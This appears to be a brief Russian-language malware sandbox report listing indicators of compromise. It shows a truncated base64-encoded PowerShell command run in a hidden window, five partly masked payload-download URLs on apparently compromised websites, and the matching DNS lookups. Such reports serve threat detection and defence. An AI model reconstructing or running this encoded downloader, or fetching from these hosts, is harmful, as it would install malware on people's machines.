Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAHUAZgByAG8AaQBvAHUAZwA9ACcAQQBqAGwAbAB3AHAAbABiAGsAJwA7ACQAWQBrAG0AYgBvAHoAYwB6ACAAPQAgACcANgA0AD...
- http://ma#####monkeymedia.com/wp-includes/certificates/aOVgFnm/
- http://ar##ika.id/wp-includes/LnNNqm/
- http://as###dum.com.au/data/xVVjqa/
- http://cl#####ltisaude.com.br/erros/EFWlRHy/
- http://cl###energy.pl/wp-admin/enl3t-lklwtk-79/
- DNS ASK ma#####monkeymedia.com
- DNS ASK ar##ika.id
- DNS ASK as###dum.com.au
- DNS ASK cl#####ltisaude.com.br
- DNS ASK cl###energy.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABVAHUAZgByAG8AaQBvAHUAZwA9ACcAQQBqAGwAbAB3AHAAbABiAGsAJwA7ACQAWQBrAG0AYgBvAHoAYwB6ACAAPQAgACcANgA0AD...' (со скрытым окном)